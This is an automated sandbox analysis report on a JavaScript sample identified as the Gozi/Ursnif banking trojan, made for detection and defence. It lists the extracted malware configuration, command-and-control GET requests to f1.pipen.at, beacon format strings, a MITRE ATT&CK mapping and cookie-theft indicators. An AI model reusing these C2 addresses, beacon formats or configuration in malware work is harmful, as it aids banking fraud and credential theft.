Loading ...

Play interactive tourEdit tour

Analysis Report job_attach_t9o.js

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:224563
Start date:22.04.2020
Start time:19:51:31
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 49s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:job_attach_t9o.js
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Run name:Without Instrumentation
Number of analysed new started processes analysed:16
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.evad.winJS@19/18@4/1
EGA Information:
  • Successful, ratio: 66.7%
HDC Information:
  • Successful, ratio: 4.8% (good quality ratio 4.4%)
  • Quality average: 78%
  • Quality standard deviation: 28.5%
HCA Information:
  • Successful, ratio: 85%
  • Number of executed functions: 128
  • Number of non-executed functions: 262
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Start process as user (medium integrity level)
  • Found application associated with file extension: .js
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, ielowutil.exe, WMIADAP.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 2.18.68.82, 2.20.142.209, 2.20.142.210, 23.61.218.119, 152.199.19.161
  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, fs.microsoft.com, ie9comview.vo.msecnd.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, audownload.windowsupdate.nsatc.net, go.microsoft.com.edgekey.net, prod.fs.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
  • Execution Graph export aborted for target mshta.exe, PID 4872 because there are no executed function
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Gozi Ursnif
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Windows Management Instrumentation2Valid Accounts1Valid Accounts1Scripting12Credential DumpingSystem Time Discovery1Remote File Copy3Email Collection1Data Encrypted1Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaPowerShell1Port MonitorsAccess Token Manipulation1Obfuscated Files or Information2Network SniffingAccount Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesScripting12Accessibility FeaturesProcess Injection513Masquerading11Input CaptureSecurity Software Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseExecution through API3System FirmwareDLL Search Order HijackingValid Accounts1Credentials in FilesFile and Directory Discovery3Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol3SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationExploitation for Client Execution1Shortcut ModificationFile System Permissions WeaknessVirtualization/Sandbox Evasion2Account ManipulationSystem Information Discovery45Shared WebrootData StagedScheduled TransferConnection Proxy1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User Interface1Modify Existing ServiceNew ServiceAccess Token Manipulation1Brute ForceVirtualization/Sandbox Evasion2Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentCommand-Line Interface12Path InterceptionScheduled TaskProcess Injection513Two-Factor Authentication InterceptionProcess Discovery3Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionDLL Side-Loading1Bash HistoryApplication Window Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessConnection Proxy1Input PromptSystem Owner/User Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Found malware configurationShow sources
Source: regsvr32.exe.3064.4.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "318", "system": "1ce5daae129a99d4ae35102f58b42ad9hh", "size": "200780", "crc": "2", "action": "00000000", "id": "2000", "time": "1587610402", "user": "31b341dd54c8a3b79c4b2eb50a222cb3", "hash": "0x0d8e127a", "soft": "3"}
Multi AV Scanner detection for domain / URLShow sources
Source: f1.pipen.atVirustotal: Detection: 6%Perma Link
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\ZyQNToG.txtJoe Sandbox ML: detected

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004D7EE6 memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,4_2_004D7EE6
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AB940E RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,4_2_04AB940E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AACDF2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,4_2_04AACDF2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AA8181 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,4_2_04AA8181
Contains functionality to query local drivesShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AB7CDC wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,4_2_04AB7CDC

Networking:

barindex
Creates a COM Internet Explorer objectShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
Found Tor onion addressShow sources
Source: regsvr32.exe, 00000004.00000002.1235424292.0000000004AA0000.00000040.00000001.sdmpString found in binary or memory: wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: regsvr32.exe, 00000004.00000003.1190242494.0000000000700000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 0000000F.00000003.1207232988.000001C7C63B0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /api1/igWBhEmvOe/UIhCLtvNNXA3Dhj_2/FDj_2FhLMSjk/G2Mw_2BTqcj/WegL_2FTjWSGj_/2FQ7v9chL1T5gjSYxJAiY/_2Bo30CBK7VKTcdT/u_2Fo3Lwwjidq6f/gkat_2BzUqBrDmvBc_/2FtyT2dtZ/vQHbB_2Be_2BAAG7pJhi/C15rCUYZlIEsxrMCoAm/FKbt_2BLCFWhZNCd_2BPnU/gcbG1zc0ODs_2/BGWoM9Vl/1aKCqNIzIN_2F0QMkCtmkqB/SzEBLowGkq/ovuWPakyr_2Bx9RSH/r_2Bla4aiW1_/0A_0DGRCCTm/J4coQX1Gvn4zEH/ZAf_2FUNzBlZHtdDG94Ky/lcDJ5YoBo5c_2FBW/jWsyzscpN/jENWu6 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /api1/nMsAh3YXAYzJDAiL4Z/e_2BLHmGu/54qdcInbRmYcAGNG6OmQ/qFgtvTMg144czR9IiDf/IaNYGuavmX1oVVv0Qa_2BQ/VObzIpbd975it/gn4L_2Ft/gFwgJD2AlQQWrL4a97_2BXd/EuMy3IhIJa/7K1g0HkYfMM9S08Ve/3nzA4MqygIUp/rbS7jXMb1bX/fusyDtiAk_2B3T/BV6_2B0pzOB4j70XHHHM6/wp7YGpsRw_2FNWVQ/9bG5DkfOvjWhJc0/0SrCcVEbG_2FdVBgvK/H9_0A_0Dl/hYEyuXO4zy2QT1bk0e6m/6hy0kjdWltkg_2Fvkdg/2HH3Qi02z39s1MX8m4U46E/z2hRqWc7 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /api1/SwlOID5x_2/BfdmKd57Yhi_2BOMV/5FAIlkI_2BNq/zR_2F68jXiN/7BcXkZyyMtb6cV/r_2BfHQUgvzhsbFnmW1T3/xaxNPV4No_2FqUl5/fcpGTLzM6ohz3RR/eJMP_2BCja480ogUBM/9WsZ4Dp9k/KZWwvWd8PiRwLrQ_2Bbs/yv5rQuy_2BmPOAf5kSL/sEBoaXlGTv_2Bv2q5eC9Nc/0F119tcQRA0Y5/v9SWUo_2/FSPcKYiRRapd_2BMCIzbDAy/voyGRshx88/4X6pYNySka17rDA0n/j_0A_0DI3k4t/cShpyQHdKW_/2FWYRUw5WG4RJ0/78sEkUxauCKfeGP7kjzyd/tYj2AF6SYZdqV/vFgR8z HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f1.pipen.atConnection: Keep-Alive
Found strings which match to known social media urlsShow sources
Source: msapplication.xml0.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6bc36459,0x01d6191a</date><accdate>0x6bc36459,0x01d6191a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6bc36459,0x01d6191a</date><accdate>0x6bc36459,0x01d6191a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6bcb2260,0x01d6191a</date><accdate>0x6bcb2260,0x01d6191a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6bcb2260,0x01d6191a</date><accdate>0x6bcb2260,0x01d6191a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6bcdad39,0x01d6191a</date><accdate>0x6bcdad39,0x01d6191a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6bcdad39,0x01d6191a</date><accdate>0x6bcdad39,0x01d6191a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: f1.pipen.at
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 Apr 2020 17:53:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Urls found in memory or binary dataShow sources
Source: regsvr32.exe, control.exe, 0000000F.00000003.1207232988.000001C7C63B0000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000004.00000002.1235424292.0000000004AA0000.00000040.00000001.sdmp, control.exe, 0000000F.00000003.1207232988.000001C7C63B0000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: regsvr32.exe, 00000003.00000002.1231089131.0000000001840000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.1233989902.0000000002D40000.00000002.00000001.sdmp, control.exe, 0000000F.00000002.1277361914.000001C7C6990000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1256681400.0000000001170000.00000002.00000001.sdmpString found in binary or memory: http://f1.pipen.at/api1/SwlOID5x_2/BfdmKd57Yhi_2BOMV/5FAIlkI_2BNq/zR_2F68jXiN/7BcXkZyyMtb6cV/r_
Source: explorer.exe, 00000010.00000000.1238599229.0000000007C26000.00000004.00000001.sdmpString found in binary or memory: http://f1.pipen.at/api1/SwlOID5x_2/BfdmKd57Yhi_2BOMV/5FAIlkI_2BNq/zR_2F68jXiN/7BcXkZyyMtb6cV/r_2BfHQ
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: regsvr32.exe, 00000004.00000002.1235424292.0000000004AA0000.00000040.00000001.sdmp, regsvr32.exe, 00000004.00000003.1190242494.0000000000700000.00000004.00000001.sdmp, control.exe, 0000000F.00000003.1207232988.000001C7C63B0000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: msapplication.xml.7.drString found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000010.00000002.1272924871.0000000007A37000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: msapplication.xml1.7.drString found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: msapplication.xml2.7.drString found in binary or memory: http://www.live.com/
Source: msapplication.xml3.7.drString found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.7.drString found in binary or memory: http://www.reddit.com/
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: msapplication.xml5.7.drString found in binary or memory: http://www.twitter.com/
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: msapplication.xml6.7.drString found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.7.drString found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000010.00000000.1240050860.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.1064584505.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1107254349.0000000004D5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1235424292.0000000004AA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064674452.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064703086.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064524352.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1207232988.000001C7C63B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064632588.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064218194.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1276679333.000000000033E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1190242494.0000000000700000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064435714.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064335431.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3064, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 4740, type: MEMORY

E-Banking Fraud:

barindex
Detected Gozi e-Banking trojanShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ff4_2_04ABFB8F
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ie4_2_04ABFB8F
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.1064584505.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1107254349.0000000004D5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1235424292.0000000004AA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064674452.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064703086.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064524352.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1207232988.000001C7C63B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064632588.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064218194.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1276679333.000000000033E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1190242494.0000000000700000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064435714.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064335431.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3064, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 4740, type: MEMORY

System Summary:

barindex
Writes or reads registry keys via WMIShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMIShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
